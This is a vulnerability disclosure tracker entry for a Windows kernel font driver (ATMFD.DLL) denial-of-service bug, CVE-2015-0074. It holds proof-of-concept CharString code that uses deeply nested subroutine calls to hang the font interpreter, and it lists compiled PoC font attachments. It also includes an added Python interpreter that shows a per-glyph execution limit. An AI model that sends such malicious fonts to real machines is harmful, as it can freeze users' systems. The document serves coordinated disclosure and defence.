Status: Fixed
Closed: Apr 2015
Windows Kernel ATMFD.DLL DoS via unlimited CharString program execution
Project Member Reported by mjurczyk@google.com, Nov 14 2014
The Adobe Type Manager Font Driver (ATMFD.DLL) used by the Windows kernel to handle Type1 (.PFB + .PFM) and OpenType (.OTF) fonts does not limit the number of state machine instructions which can be executed per glyph, while e.g. FreeType sets the maximum to 20'000'000.

By using multiple nested calls of subroutines and computationally expensive operations (such as drawing outlines), it is possible to cause ATMFD.DLL to get stuck in the main VM execution loop forever, thus consuming 100% of a single CPU (can be scaled to attack multiple CPUs) and implicitly creating an unkillable process.

The issue is reproducible with both Type-1 and OTF fonts on all Microsoft Windows editions (up to 8.1), regardless of bitness. The most obvious attack scenario would be to conduct the attack locally, but since CSS allows arbitrary OTF fonts to be embedded in websites, this can be potentially exploited in a remote manner in the context of browsers which use GDI for font rasterization. Other remote vectors (e.g. through PDF / Office documents) might also be viable, but have not been investigated.

The following CharString code causes 65536 drawing operations to be performed, which is sufficient to demonstrate the attack on any modern machine:

          <CharString index="40">
            -100 0 rmoveto 100 100 rlineto 0 -100 rlineto return
          </CharString>
          <CharString index="41">
            -67 callsubr -67 callsubr -67 callsubr -67 callsubr
            -67 callsubr -67 callsubr -67 callsubr -67 callsubr
            -67 callsubr -67 callsubr -67 callsubr -67 callsubr
            -67 callsubr -67 callsubr -67 callsubr -67 callsubr
            return
          </CharString>
          <CharString index="42">
            -66 callsubr -66 callsubr -66 callsubr -66 callsubr
            -66 callsubr -66 callsubr -66 callsubr -66 callsubr
            -66 callsubr -66 callsubr -66 callsubr -66 callsubr
            -66 callsubr -66 callsubr -66 callsubr -66 callsubr
            return
          </CharString>
          <CharString index="43">
            -65 callsubr -65 callsubr -65 callsubr -65 callsubr
            -65 callsubr -65 callsubr -65 callsubr -65 callsubr
            -65 callsubr -65 callsubr -65 callsubr -65 callsubr
            -65 callsubr -65 callsubr -65 callsubr -65 callsubr
            return
          </CharString>
          <CharString index="44">
            -64 callsubr -64 callsubr -64 callsubr -64 callsubr
            -64 callsubr -64 callsubr -64 callsubr -64 callsubr
            -64 callsubr -64 callsubr -64 callsubr -64 callsubr
            -64 callsubr -64 callsubr -64 callsubr -64 callsubr
            return
          </CharString>
[...]
        <CharString name="A">
          100 0 rmoveto -63 callsubr endchar
        </CharString>
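The nesting shown above, as an added example that is not part of the original report: a small Type 2 CharString interpreter (hypothetical code, not ATMFD.DLL's or FreeType's) that enforces the per-glyph operator budget the report says ATMFD.DLL lacks. It assumes the Type 2 subroutine bias of 107, under which the report's `-67 callsubr` addresses subr index 40, and the subroutine table is constructed from the CharStrings quoted above.

```python
SUBR_BIAS = 107  # Type 2 subr bias for fonts with < 1240 subrs: "-67 callsubr" is subr 40

class BudgetExceeded(Exception):
    pass

def parse(text):
    # "num num op ..." text -> list of ints and operator names
    return [int(t) if t.lstrip("-").isdigit() else t for t in text.split()]

def render_glyph(program, subrs, max_ops):
    """Interpret one glyph; return (status, operators run, drawing steps).
    status is "ok", or "aborted" if the glyph exceeded max_ops operators."""
    counts = {"ops": 0, "draw": 0}
    stack = []

    def run(tokens):  # returns True once endchar is reached
        for tok in tokens:
            if isinstance(tok, int):
                stack.append(tok)
                continue
            counts["ops"] += 1
            if counts["ops"] > max_ops:  # the per-glyph limit ATMFD.DLL lacked
                raise BudgetExceeded(counts["ops"])
            if tok in ("rmoveto", "rlineto"):
                counts["draw"] += len(stack) // 2  # one step per dx dy pair
                stack.clear()
            elif tok == "callsubr":
                if run(subrs[stack.pop() + SUBR_BIAS]):
                    return True
            elif tok == "return":
                return False
            elif tok == "endchar":
                return True
            else:
                raise ValueError(f"unsupported operator {tok}")
        return False

    try:
        run(program)
        return ("ok", counts["ops"], counts["draw"])
    except BudgetExceeded:
        return ("aborted", counts["ops"], counts["draw"])

# Constructed from the report's CharStrings: four levels of 16 calls each, so subr 40 runs 16**4 times
POC_SUBRS = {40: parse("-100 0 rmoveto 100 100 rlineto 0 -100 rlineto return"),
             41: parse("-67 callsubr " * 16 + "return"),
             42: parse("-66 callsubr " * 16 + "return"),
             43: parse("-65 callsubr " * 16 + "return"),
             44: parse("-64 callsubr " * 16 + "return")}
GLYPH_A = parse("100 0 rmoveto -63 callsubr endchar")
```

With a FreeType-sized budget of 20'000'000 the glyph completes after 336420 operators and 196609 drawing steps; with a budget of 10'000 the interpreter aborts the glyph instead of spinning.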

Attached are the following POC files:

1) The source code of an OTF file (poc.ttx) and the resulting font (poc.otf) compiled with the "ttx" utility, part of the open-source "fonttools" project (https://github.com/behdad/fonttools/).

2) The source code of a Type-1 font (poc.pfa) and the resulting font (poc.pfb, poc.pfm) compiled with the "type1" utility, part of the "Adobe Font Development Kit for OpenType" software package (http://www.adobe.com/devnet/opentype/afdko/topic_overview.html).

Attachments:
poc.pfb (20.0 KB)
poc.otf (7.6 KB)
poc.pfm (668 bytes)
poc.ttx (99 KB)
poc.pfa (54.9 KB)
Project Member Comment 1 by mjurczyk@google.com, Nov 14 2014
Summary: Windows Kernel ATMFD.DLL DoS via unlimited CharString program execution (was: Windows Kernel ATMFD.DLL Type-1 and OTF handling DoS via unlimited CharString program execution)
Project Member Comment 2 by mjurczyk@google.com, Nov 18 2014
This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.
Project Member Comment 3 by mjurczyk@google.com, Dec 4 2014
Labels: -Product-Windows Product-Kernel
Project Member Comment 4 by mjurczyk@google.com, Dec 11 2014
Labels: Reported-2014-Dec-10 MSRC-21195
Project Member Comment 5 by mjurczyk@google.com, Mar 24 2015
Labels: CVE-2015-0074
Comment 6 by cevans@google.com, Apr 1 2015
Status: Fixed
Project Member Comment 7 by mjurczyk@google.com, Apr 20 2015
Labels: Fixed-2015-Mar-10
Project Member Comment 8 by mjurczyk@google.com, Jun 12 2015
Labels: -Restrict-View-Commit